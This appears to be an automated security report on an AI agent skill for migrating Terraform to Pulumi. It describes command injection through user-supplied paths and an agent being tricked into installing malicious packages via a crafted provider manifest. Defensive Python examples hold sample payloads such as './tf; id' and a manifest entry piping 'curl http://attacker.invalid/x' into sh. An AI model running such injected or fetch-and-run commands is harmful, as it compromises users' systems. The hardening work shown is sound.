Trust Assessment
pulumi-terraform-to-pulumi received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include Command Injection via User-Controlled Paths, Command Injection via User-Controlled Paths in Plugin Execution, Supply Chain Risk via Dynamically Installed Dependencies.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 18/100; all four findings listed below were raised by that layer, which reviews the instructions the skill gives the agent rather than packaged code.
Last analyzed on April 1, 2026 (commit bbf441e6). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)

| Severity | Finding | Description | Recommendation | Layer | Location |
|---|---|---|---|---|---|
| CRITICAL | Command Injection via User-Controlled Paths | The skill instructs the agent to construct and execute shell commands using user-provided directory paths (`${terraform_dir}` and `${pulumi_dir}`) without apparent sanitization. A malicious user could inject arbitrary shell commands by providing specially crafted paths, leading to remote code execution within the agent's environment. | Implement strict input validation and sanitization for all user-provided paths. Validate paths against a whitelist of allowed characters or a strict regex for valid directory names. When paths are used in shell commands, quote and escape them properly to prevent command injection (e.g., using `shlex.quote` in Python or a similar language-specific mechanism). | LLM | SKILL.md:20 |
| CRITICAL | Command Injection via User-Controlled Paths in Plugin Execution | Similar to the previous finding, the skill uses user-controlled directory paths (`${terraform_dir}` and `${pulumi_dir}`) directly in the `pulumi plugin run terraform-migrate` command. This presents another critical command injection vulnerability, allowing a malicious user to execute arbitrary commands by manipulating the input paths. | As for the previous finding: validate all user-provided paths against a whitelist of allowed characters or a strict regex for valid directory names, and quote and escape them properly when they are used in shell commands (e.g., `shlex.quote` in Python or a similar language-specific mechanism). | LLM | SKILL.md:25 |
| HIGH | Supply Chain Risk via Dynamically Installed Dependencies | The skill instructs the agent to install package dependencies (e.g., `npm install`, `pip install`) based on provider names and versions read from a dynamically generated JSON file (`/tmp/required-providers.json`). This file is produced by the `pulumi plugin run terraform-migrate` command. If the `terraform-migrate` plugin is compromised, or if a malicious Terraform state file can be crafted to inject arbitrary package names or versions into `/tmp/required-providers.json`, the agent could be tricked into installing malicious software from public package registries. | Implement robust validation of package names and versions read from `/tmp/required-providers.json` before executing installation commands. Consider whitelisting allowed provider names and/or verifying package integrity (e.g., via checksums or trusted registries). Ensure the `terraform-migrate` plugin is from a trusted source and its integrity is verified. | LLM | SKILL.md:38 |
| MEDIUM | Sensitive Data Exposure via Temporary Files | The skill instructs the agent to create local files containing sensitive information: `terraform.tfstate` (from `terraform state pull`) and `/tmp/pulumi-state.json` (the translated Pulumi state). These files can contain cloud provider credentials, API keys, and other secrets. While necessary for the migration process, the skill does not include instructions for securely handling, restricting access to, or promptly deleting these files after use. This creates a risk of sensitive data exposure if the agent's execution environment is compromised or if the files persist longer than necessary. | Add explicit instructions for the agent to securely handle these temporary files: 1) set file permissions that restrict access, 2) delete the files immediately after their contents have been processed and are no longer needed, and 3) consider in-memory processing where feasible to avoid writing sensitive data to disk. | LLM | SKILL.md:20 |
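The two CRITICAL findings share one root cause: user-supplied paths interpolated into a shell command line. The following Python example is added here to illustrate the remediation the report recommends; it is not code from the skill, from SkillShield, or from Pulumi. It shows the vulnerable string-building pattern beside a hardened version that validates each path against a strict segment regex, confines it to a workspace directory, and passes it as a separate argv element with no shell at all, falling back to `shlex.quote` only when a single shell string is unavoidable. The positional argument order of `terraform-migrate`, the workspace base directory, and the function names are assumptions for illustration, not the plugin's documented CLI.

```python
import re
import shlex
import subprocess
from pathlib import Path

# One path segment: letters, digits, ".", "_" and "-"; a segment may not begin
# with "-" so a path can never be parsed as an option by the called program.
_SEGMENT = r"[A-Za-z0-9._][A-Za-z0-9._-]*"
# Whole path: workspace-relative segments separated by "/", optional trailing "/".
# Spaces, ";", "$", "`", "|", "&" and every other shell metacharacter are rejected.
_SAFE_PATH = re.compile(rf"^{_SEGMENT}(?:/{_SEGMENT})*/?$")


def vulnerable_command(terraform_dir: str, pulumi_dir: str) -> str:
    """The pattern the finding describes: raw paths dropped into one shell string.
    A value such as './tf; id' makes the shell run 'id' after the real command.
    Argument layout of terraform-migrate is an assumption, not the plugin's CLI."""
    return f"pulumi plugin run terraform-migrate {terraform_dir} {pulumi_dir}"


def validate_dir(path: str, base: str) -> Path:
    """Return the absolute path if `path` is syntactically safe and, once
    '..' segments are resolved, still lies inside the workspace `base`."""
    if not _SAFE_PATH.match(path):
        raise ValueError(f"path contains disallowed characters: {path!r}")
    root = Path(base).resolve()
    resolved = (root / path).resolve()
    if resolved != root and root not in resolved.parents:
        raise ValueError(f"path escapes workspace {root}: {path!r}")
    return resolved


def is_safe_dir(path: str, base: str) -> bool:
    """Boolean wrapper around validate_dir for callers that only need a verdict."""
    try:
        validate_dir(path, base)
        return True
    except ValueError:
        return False


def build_migrate_argv(terraform_dir: str, pulumi_dir: str, base: str) -> list[str]:
    """Hardened form: validated paths become separate argv entries. Because the
    list goes to subprocess without a shell, nothing in them is re-parsed."""
    tf = validate_dir(terraform_dir, base)
    pu = validate_dir(pulumi_dir, base)
    return ["pulumi", "plugin", "run", "terraform-migrate", str(tf), str(pu)]


def run_migrate(terraform_dir: str, pulumi_dir: str, base: str) -> subprocess.CompletedProcess:
    """Execute the hardened command. shell=False is the default; it is written
    out here because it is the property that removes the injection surface."""
    argv = build_migrate_argv(terraform_dir, pulumi_dir, base)
    return subprocess.run(argv, shell=False, check=True)


def as_shell_line(argv: list[str]) -> str:
    """Only if a single command string is unavoidable (an agent that can emit
    nothing but a shell line): quote every element so the shell sees one word each."""
    return " ".join(shlex.quote(arg) for arg in argv)


if __name__ == "__main__":
    # Constructed inputs: one benign pair and one carrying a shell payload.
    print(vulnerable_command("./tf; id", "./pu"))          # the payload survives
    print(is_safe_dir("./tf; id", "/workspace"))          # False: rejected up front
    print(build_migrate_argv("infra/tf", "infra/pu", "/workspace"))
    print(as_shell_line(["echo", "a; id"]))               # echo 'a; id'
```

Validation happens before any path reaches a command, so the rejection message never contains executed output; the `..` check matters because `../../etc` passes a pure character whitelist yet points outside the directory the agent was asked to work in.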
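For the HIGH finding, the report recommends validating every provider name and version read from `/tmp/required-providers.json` and whitelisting allowed providers before running `npm install` or `pip install`. The Python example below is added to show that gate; it is not code from the skill, SkillShield, or Pulumi. The page does not show the file's schema, so the `{"providers": [{"name", "version", "language"}]}` layout, the allowlist contents, and the sample manifest (including its hostile entries) are constructed for illustration. The package naming patterns `@pulumi/<name>` (npm) and `pulumi-<name>` (PyPI) follow Pulumi's published provider packages; `--ignore-scripts` (npm) and `--only-binary :all:` (pip) are real flags that stop install-time script execution.

```python
import json
import re

# Assumed allowlist of providers the migration is permitted to pull in.
ALLOWED_PROVIDERS = {"aws", "azure-native", "gcp", "kubernetes", "random"}

# Exact three-part version pin only: no ranges, tags, URLs or VCS specs.
_EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+$")

# Constructed sample of /tmp/required-providers.json with two good entries
# and four that a compromised plugin or crafted state file might emit.
SAMPLE_MANIFEST = json.dumps({
    "providers": [
        {"name": "aws", "version": "6.0.0", "language": "nodejs"},
        {"name": "random", "version": "4.0.0", "language": "python"},
        {"name": "aws; curl http://attacker.invalid/x | sh", "version": "6.0.0", "language": "nodejs"},
        {"name": "aws-helper", "version": "1.0.0", "language": "nodejs"},        # not on the allowlist
        {"name": "gcp", "version": "git+https://attacker.invalid/gcp.git", "language": "python"},
        {"name": "kubernetes", "version": "^4.0.0", "language": "nodejs"},       # range, not a pin
    ]
})


def validate_entry(entry: dict) -> tuple[str, str, str]:
    """Accept an entry only if name, version and language are all strings,
    the name is on the allowlist, and the version is an exact pin."""
    name, version, lang = entry.get("name"), entry.get("version"), entry.get("language")
    if not isinstance(name, str) or name not in ALLOWED_PROVIDERS:
        raise ValueError(f"provider not allowlisted: {name!r}")
    if not isinstance(version, str) or not _EXACT_VERSION.match(version):
        raise ValueError(f"version is not an exact pin: {version!r}")
    if lang not in ("nodejs", "python"):
        raise ValueError(f"unsupported language: {lang!r}")
    return name, version, lang


def install_argv(entry: dict) -> list[str]:
    """Build the installer command as an argv list (no shell) from a validated entry."""
    name, version, lang = validate_entry(entry)
    if lang == "nodejs":
        # --ignore-scripts blocks preinstall/postinstall hooks from the package.
        return ["npm", "install", "--ignore-scripts", f"@pulumi/{name}@{version}"]
    # --only-binary :all: refuses sdists, so no setup.py runs at install time.
    return ["python", "-m", "pip", "install", "--only-binary", ":all:", f"pulumi-{name}=={version}"]


def plan_installs(manifest_text: str) -> tuple[list[list[str]], list[tuple[dict, str]]]:
    """Parse the manifest and split entries into accepted argv lists and
    rejected (entry, reason) pairs. Nothing is executed here."""
    data = json.loads(manifest_text)
    accepted, rejected = [], []
    for entry in data.get("providers", []):
        try:
            accepted.append(install_argv(entry))
        except ValueError as exc:
            rejected.append((entry, str(exc)))
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = plan_installs(SAMPLE_MANIFEST)
    for argv in ok:
        print("would run:", argv)
    for entry, reason in bad:
        print("rejected:", entry.get("name"), "->", reason)
```

The allowlist is the real control: a name that merely looks like a valid npm or PyPI package (the `aws-helper` entry) is still refused. Pinning exact versions against a lockfile or recorded hashes, as the report also suggests, is the next step this gate does not perform.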
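For the MEDIUM finding, the recommended handling of `terraform.tfstate` and `/tmp/pulumi-state.json` is restricted permissions plus prompt deletion. The Python example below is an added illustration of that pattern, not code from the skill or from SkillShield: a context manager creates a private 0700 directory, opens the state file with `O_CREAT|O_EXCL` and mode 0600 so an attacker cannot pre-plant a symlink at a predictable `/tmp` name, and removes both file and directory on exit even if processing raises. The state content written is a constructed placeholder, and the function names are assumptions.

```python
import os
import stat
import tempfile
from contextlib import contextmanager
from pathlib import Path


@contextmanager
def private_state_file(name: str = "pulumi-state.json"):
    """Yield (file object, path) for a state file that only the current user can
    read, inside a fresh directory; delete both when the block ends."""
    # mkdtemp creates the directory with mode 0700 regardless of umask and
    # with an unpredictable name, so no one can pre-create the path.
    workdir = Path(tempfile.mkdtemp(prefix="pulumi-migrate-"))
    path = workdir / name
    # O_EXCL fails if the name already exists, which defeats symlink planting;
    # mode 0600 keeps other local users from reading the state.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    try:
        with os.fdopen(fd, "w") as handle:
            yield handle, path
    finally:
        # Delete as soon as the caller is done, whether or not it raised.
        if path.exists():
            path.unlink()
        workdir.rmdir()


def process_state_privately() -> dict:
    """Write a constructed sample state, record the modes while the file exists,
    and report whether anything is left behind afterwards."""
    sample_state = '{"version": 3, "resources": []}'  # constructed, not real state
    with private_state_file() as (handle, path):
        handle.write(sample_state)
        handle.flush()
        file_mode = stat.S_IMODE(path.stat().st_mode)
        dir_mode = stat.S_IMODE(path.parent.stat().st_mode)
        kept = path
    return {
        "file_mode": file_mode,
        "dir_mode": dir_mode,
        "exists_after": kept.exists(),
        "dir_exists_after": kept.parent.exists(),
    }


if __name__ == "__main__":
    print({k: (oct(v) if isinstance(v, int) else v) for k, v in process_state_privately().items()})
```

Deleting the file does not scrub it from the underlying storage, which is why the report also suggests in-memory processing where feasible; `terraform state pull` writes to standard output, so the pulled state can be piped into this kind of private file rather than a world-readable default path.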
Full report: https://skillshield.io/report/faee9bd9bb2c961e (powered by SkillShield)